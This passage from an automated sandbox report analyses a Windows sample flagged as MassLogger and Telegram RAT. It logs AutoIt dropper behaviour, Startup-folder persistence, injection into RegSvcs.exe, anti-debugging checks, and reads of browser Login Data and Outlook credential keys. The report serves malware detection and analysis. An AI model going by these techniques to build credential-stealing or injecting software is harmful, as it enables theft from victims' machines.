Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593661	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599452	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599124	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598466	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598124	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597249	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597139	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596046	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595827	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595717	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595390	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595171	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595062	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594843	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594625	Jump to behavior

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior

Source: RegSvcs.exe, 00000003.00000002.4817627684.0000000000D56000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll-$
Source: RegSvcs.exe, 00000008.00000002.4817671977.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 8_2_056F7210 LdrInitializeThunk,LdrInitializeThunk,

8_2_056F7210

Source: C:\Users\user\Desktop\eLo1khn7DQ.exe

Code function: 0_2_0026EAA2 BlockInput,

0_2_0026EAA2

Source: C:\Users\user\Desktop\eLo1khn7DQ.exe

Code function: 0_2_00222622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00222622

Source: C:\Users\user\Desktop\eLo1khn7DQ.exe

Code function: 0_2_001F42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_001F42DE

Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_00214CE8 mov eax, dword ptr fs:[00000030h]	0_2_00214CE8
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_00E5C4E8 mov eax, dword ptr fs:[00000030h]	0_2_00E5C4E8
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_00E5C548 mov eax, dword ptr fs:[00000030h]	0_2_00E5C548
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_00E5AE68 mov eax, dword ptr fs:[00000030h]	0_2_00E5AE68
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_00104CE8 mov eax, dword ptr fs:[00000030h]	2_2_00104CE8
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_01560168 mov eax, dword ptr fs:[00000030h]	2_2_01560168
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_01560108 mov eax, dword ptr fs:[00000030h]	2_2_01560108
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_0155EA88 mov eax, dword ptr fs:[00000030h]	2_2_0155EA88
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 7_2_015C1120 mov eax, dword ptr fs:[00000030h]	7_2_015C1120
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 7_2_015C1180 mov eax, dword ptr fs:[00000030h]	7_2_015C1180
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 7_2_015BFAA0 mov eax, dword ptr fs:[00000030h]	7_2_015BFAA0

Source: C:\Users\user\Desktop\eLo1khn7DQ.exe

Code function: 0_2_00250B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_00250B62

Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_00222622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00222622
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_0021083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0021083F
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_002109D5 SetUnhandledExceptionFilter,	0_2_002109D5
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_00210C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00210C21
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_00112622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00112622
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_0010083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_0010083F
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_001009D5 SetUnhandledExceptionFilter,	2_2_001009D5
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_00100C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00100C21

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\done\lustring.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\done\lustring.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\done\lustring.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 99D008			Jump to behavior
Source: C:\Users\user\AppData\Local\done\lustring.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: B77008			Jump to behavior

Source: C:\Users\user\Desktop\eLo1khn7DQ.exe

0_2_00251201

Source: C:\Users\user\Desktop\eLo1khn7DQ.exe

Code function: 0_2_00232BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00232BA5

Source: C:\Users\user\Desktop\eLo1khn7DQ.exe

Code function: 0_2_0025B226 SendInput,keybd_event,

0_2_0025B226

Source: C:\Users\user\Desktop\eLo1khn7DQ.exe

Code function: 0_2_002722DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

0_2_002722DA

Source: C:\Users\user\AppData\Local\done\lustring.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\eLo1khn7DQ.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\done\lustring.exe "C:\Users\user\AppData\Local\done\lustring.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\done\lustring.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\done\lustring.exe"	Jump to behavior

Source: C:\Users\user\Desktop\eLo1khn7DQ.exe

0_2_00250B62

Source: C:\Users\user\Desktop\eLo1khn7DQ.exe

Code function: 0_2_00251663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00251663

Source: eLo1khn7DQ.exe, lustring.exe.0.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: eLo1khn7DQ.exe, lustring.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\Desktop\eLo1khn7DQ.exe

Code function: 0_2_00210698 cpuid

0_2_00210698

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\eLo1khn7DQ.exe

Code function: 0_2_00268195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,

0_2_00268195

Source: C:\Users\user\Desktop\eLo1khn7DQ.exe

Code function: 0_2_0024D27A GetUserNameW,

0_2_0024D27A

Source: C:\Users\user\Desktop\eLo1khn7DQ.exe

Code function: 0_2_0022B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

0_2_0022B952

Source: C:\Users\user\Desktop\eLo1khn7DQ.exe

Code function: 0_2_001F42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_001F42DE

Source: C:\Users\user\Desktop\eLo1khn7DQ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected MassLogger RAT

Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.lustring.exe.21b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.lustring.exe.21b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.lustring.exe.1390000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.lustring.exe.1390000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4818118474.0000000002BDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2407127647.0000000001390000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4816616271.0000000000403000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2545717519.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4818140567.0000000002EAE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: lustring.exe PID: 7164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6180, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lustring.exe PID: 5636, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5048, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.lustring.exe.21b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.lustring.exe.21b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.lustring.exe.1390000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.lustring.exe.1390000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4818118474.0000000002BDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2407127647.0000000001390000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4816616271.0000000000403000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2545717519.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4818140567.0000000002EAE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: lustring.exe PID: 7164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6180, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lustring.exe PID: 5636, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5048, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: lustring.exe	Binary or memory string: WIN_81
Source: lustring.exe	Binary or memory string: WIN_XP
Source: lustring.exe.0.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: lustring.exe	Binary or memory string: WIN_XPe
Source: lustring.exe	Binary or memory string: WIN_VISTA
Source: lustring.exe	Binary or memory string: WIN_7
Source: lustring.exe	Binary or memory string: WIN_8

Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.lustring.exe.21b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.lustring.exe.21b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.lustring.exe.1390000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.lustring.exe.1390000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4818118474.0000000002BDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2407127647.0000000001390000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4816616271.0000000000403000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2545717519.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4818140567.0000000002EAE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: lustring.exe PID: 7164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6180, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lustring.exe PID: 5636, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5048, type: MEMORYSTR

Remote Access Functionality

Yara detected MassLogger RAT

Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.lustring.exe.21b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.lustring.exe.21b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.lustring.exe.1390000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.lustring.exe.1390000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4818118474.0000000002BDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2407127647.0000000001390000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4816616271.0000000000403000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2545717519.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4818140567.0000000002EAE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: lustring.exe PID: 7164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6180, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lustring.exe PID: 5636, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5048, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.lustring.exe.21b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.lustring.exe.21b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.lustring.exe.1390000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.lustring.exe.1390000.1.unpack, type: UNPACKEDPE
